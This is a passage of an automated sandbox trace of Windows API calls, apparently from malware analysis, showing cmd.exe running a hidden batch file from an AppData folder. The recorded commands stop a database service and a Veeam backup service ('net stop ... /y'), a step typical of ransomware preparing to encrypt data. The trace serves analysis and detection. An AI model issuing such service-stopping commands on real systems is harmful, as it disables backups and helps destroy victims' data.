hHeap=0x3e0000) returned 1 [0219.258] GetEnvironmentStringsW () returned 0x3f8408* [0219.258] GetProcessHeap () returned 0x3e0000 [0219.258] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.259] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.259] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0219.259] GetProcessHeap () returned 0x3e0000 [0219.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0219.259] GetEnvironmentStringsW () returned 0x3f8408* [0219.259] GetProcessHeap () returned 0x3e0000 [0219.259] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.259] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.259] GetProcessHeap () returned 0x3e0000 [0219.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0219.259] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0219.259] _get_osfhandle (_FileHandle=1) returned 0x264 [0219.259] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0219.259] _get_osfhandle (_FileHandle=1) returned 0x264 [0219.259] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0219.259] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0219.260] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0219.260] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0219.260] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0219.260] SetConsoleInputExeNameW () returned 0x1 [0219.260] GetConsoleOutputCP () returned 0x1b5 [0219.260] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0219.260] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.261] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0219.261] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0219.261] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.261] SetFilePointer (in: hFile=0x78, lDistanceToMove=6243, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1863 [0219.261] GetProcessHeap () returned 0x3e0000 [0219.261] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0219.261] GetProcessHeap () returned 0x3e0000 [0219.261] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0219.261] GetProcessHeap () returned 0x3e0000 [0219.261] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0219.261] GetProcessHeap () returned 0x3e0000 [0219.261] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0219.261] GetProcessHeap () returned 0x3e0000 [0219.261] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0219.261] GetProcessHeap () returned 0x3e0000 [0219.261] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0219.261] GetProcessHeap () returned 0x3e0000 [0219.261] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0219.261] GetProcessHeap () returned 0x3e0000 [0219.261] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0219.261] GetProcessHeap () returned 0x3e0000 [0219.261] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0219.261] GetProcessHeap () returned 0x3e0000 [0219.262] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0219.262] GetProcessHeap () returned 0x3e0000 [0219.262] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0219.262] GetProcessHeap () returned 0x3e0000 [0219.262] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0219.262] GetProcessHeap () returned 0x3e0000 [0219.262] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffaf0 | out: hHeap=0x3e0000) returned 1 [0219.262] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.262] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1863 [0219.262] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x5e, lpOverlapped=0x0) returned 1 [0219.262] SetFilePointer (in: hFile=0x78, lDistanceToMove=6267, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x187b [0219.262] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=24, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSOLAP$TPS /y\r\ny\r\nServiceΓÇ¥ /y\r\ny\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 24 [0219.262] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.262] GetFileType (hFile=0x78) returned 0x1 [0219.262] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.262] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x187b [0219.263] GetProcessHeap () returned 0x3e0000 [0219.263] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x400ad8 [0219.263] GetProcessHeap () returned 0x3e0000 [0219.263] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x400ad8 | out: hHeap=0x3e0000) returned 1 [0219.266] _tell (_FileHandle=3) returned 6267 [0219.266] _close (_FileHandle=3) returned 0 [0219.266] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0219.266] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0219.266] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0219.266] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0219.266] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0219.266] _wcsicmp (_String1="net", _String2="CD") returned 11 [0219.266] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0219.266] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0219.266] _wcsicmp (_String1="net", _String2="REN") returned -4 [0219.266] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0219.266] _wcsicmp (_String1="net", _String2="SET") returned -5 [0219.266] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0219.266] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0219.266] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0219.266] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0219.267] _wcsicmp (_String1="net", _String2="MD") returned 1 [0219.267] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0219.267] _wcsicmp (_String1="net", _String2="RD") returned -4 [0219.267] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0219.267] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0219.267] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0219.267] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0219.267] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0219.267] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0219.267] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0219.267] _wcsicmp (_String1="net", _String2="VER") returned -8 [0219.267] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0219.267] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0219.267] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0219.267] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0219.267] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0219.267] _wcsicmp (_String1="net", _String2="START") returned -5 [0219.267] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0219.267] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0219.267] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0219.267] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0219.267] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0219.267] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0219.267] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0219.267] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0219.267] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0219.267] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0219.268] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0219.268] SetErrorMode (uMode=0x0) returned 0x1 [0219.268] GetProcessHeap () returned 0x3e0000 [0219.268] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0219.268] GetProcessHeap () returned 0x3e0000 [0219.268] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0219.268] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0219.268] GetProcessHeap () returned 0x3e0000 [0219.268] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0219.268] GetProcessHeap () returned 0x3e0000 [0219.268] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0219.269] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0219.269] GetProcessHeap () returned 0x3e0000 [0219.269] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0219.269] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.269] GetProcessHeap () returned 0x3e0000 [0219.269] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0219.269] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0219.269] GetProcessHeap () returned 0x3e0000 [0219.269] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0219.270] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.270] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0219.270] GetLastError () returned 0x2 [0219.270] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0219.271] GetLastError () returned 0x2 [0219.271] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.271] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0219.272] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0219.272] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0219.272] GetLastError () returned 0x2 [0219.272] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0219.273] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0219.273] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.273] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0219.273] SetErrorMode (uMode=0x0) returned 0x1 [0219.274] GetProcessHeap () returned 0x3e0000 [0219.274] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0219.274] GetProcessHeap () returned 0x3e0000 [0219.274] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0219.274] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0219.274] GetProcessHeap () returned 0x3e0000 [0219.274] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0219.274] GetProcessHeap () returned 0x3e0000 [0219.274] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0219.274] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0219.274] GetProcessHeap () returned 0x3e0000 [0219.274] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0219.275] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.275] GetProcessHeap () returned 0x3e0000 [0219.275] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0219.275] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0219.275] GetProcessHeap () returned 0x3e0000 [0219.275] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0219.275] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.276] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0219.276] GetLastError () returned 0x2 [0219.277] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0219.277] GetLastError () returned 0x2 [0219.277] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.278] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3f90 [0219.278] FindClose (in: hFindFile=0x3f3f90 | out: hFindFile=0x3f3f90) returned 1 [0219.278] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0219.278] GetLastError () returned 0x2 [0219.279] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3f90 [0219.279] FindClose (in: hFindFile=0x3f3f90 | out: hFindFile=0x3f3f90) returned 1 [0219.279] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.279] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0219.279] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0219.279] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0219.280] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0219.280] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSOLAP$TPS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSOLAP$TPS /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSOLAP$TPS /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x8d4, dwThreadId=0x8f8)) returned 1 [0219.284] CloseHandle (hObject=0x78) returned 1 [0219.284] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0219.284] GetProcessHeap () returned 0x3e0000 [0219.284] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0219.284] GetEnvironmentStringsW () returned 0x3f8408* [0219.284] GetProcessHeap () returned 0x3e0000 [0219.284] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.284] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.284] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0219.514] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0219.514] CloseHandle (hObject=0x74) returned 1 [0219.514] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0219.514] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0219.514] GetProcessHeap () returned 0x3e0000 [0219.514] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0219.514] GetEnvironmentStringsW () returned 0x3f8408* [0219.514] GetProcessHeap () returned 0x3e0000 [0219.514] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.515] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.515] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0219.515] GetProcessHeap () returned 0x3e0000 [0219.515] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0219.515] GetEnvironmentStringsW () returned 0x3f8408* [0219.515] GetProcessHeap () returned 0x3e0000 [0219.515] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.515] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.515] GetProcessHeap () returned 0x3e0000 [0219.515] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0219.515] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0219.516] _get_osfhandle (_FileHandle=1) returned 0x264 [0219.516] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0219.516] _get_osfhandle (_FileHandle=1) returned 0x264 [0219.516] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0219.516] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0219.516] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0219.516] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0219.516] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0219.516] SetConsoleInputExeNameW () returned 0x1 [0219.516] GetConsoleOutputCP () returned 0x1b5 [0219.517] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0219.517] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.517] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0219.517] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0219.517] _get_osfhandle (_FileHandle=3) returned 0x74 [0219.517] SetFilePointer (in: hFile=0x74, lDistanceToMove=6267, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x187b [0219.517] GetProcessHeap () returned 0x3e0000 [0219.517] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0219.517] GetProcessHeap () returned 0x3e0000 [0219.517] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0219.517] GetProcessHeap () returned 0x3e0000 [0219.517] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0219.517] GetProcessHeap () returned 0x3e0000 [0219.517] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0219.517] GetProcessHeap () returned 0x3e0000 [0219.517] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0219.517] GetProcessHeap () returned 0x3e0000 [0219.517] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0219.517] GetProcessHeap () returned 0x3e0000 [0219.517] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0219.517] GetProcessHeap () returned 0x3e0000 [0219.517] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0219.517] GetProcessHeap () returned 0x3e0000 [0219.517] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0219.517] GetProcessHeap () returned 0x3e0000 [0219.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0219.518] GetProcessHeap () returned 0x3e0000 [0219.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0219.518] GetProcessHeap () returned 0x3e0000 [0219.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0219.518] GetProcessHeap () returned 0x3e0000 [0219.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffaf0 | out: hHeap=0x3e0000) returned 1 [0219.518] _get_osfhandle (_FileHandle=3) returned 0x74 [0219.518] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x187b [0219.518] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x46, lpOverlapped=0x0) returned 1 [0219.519] SetFilePointer (in: hFile=0x74, lDistanceToMove=6295, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1897 [0219.519] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=28, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop VeeamDeploySvc /y\r\nerviceΓÇ¥ /y\r\ny\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 28 [0219.519] _get_osfhandle (_FileHandle=3) returned 0x74 [0219.519] GetFileType (hFile=0x74) returned 0x1 [0219.519] _get_osfhandle (_FileHandle=3) returned 0x74 [0219.519] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1897 [0219.519] GetProcessHeap () returned 0x3e0000 [0219.519] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x400ad8 [0219.519] GetProcessHeap () returned 0x3e0000 [0219.519] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x400ad8 | out: hHeap=0x3e0000) returned 1 [0219.523] _tell (_FileHandle=3) returned 6295 [0219.523] _close (_FileHandle=3) returned 0 [0219.523] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0219.523] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0219.523] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0219.523] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0219.523] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0219.523] _wcsicmp (_String1="net", _String2="CD") 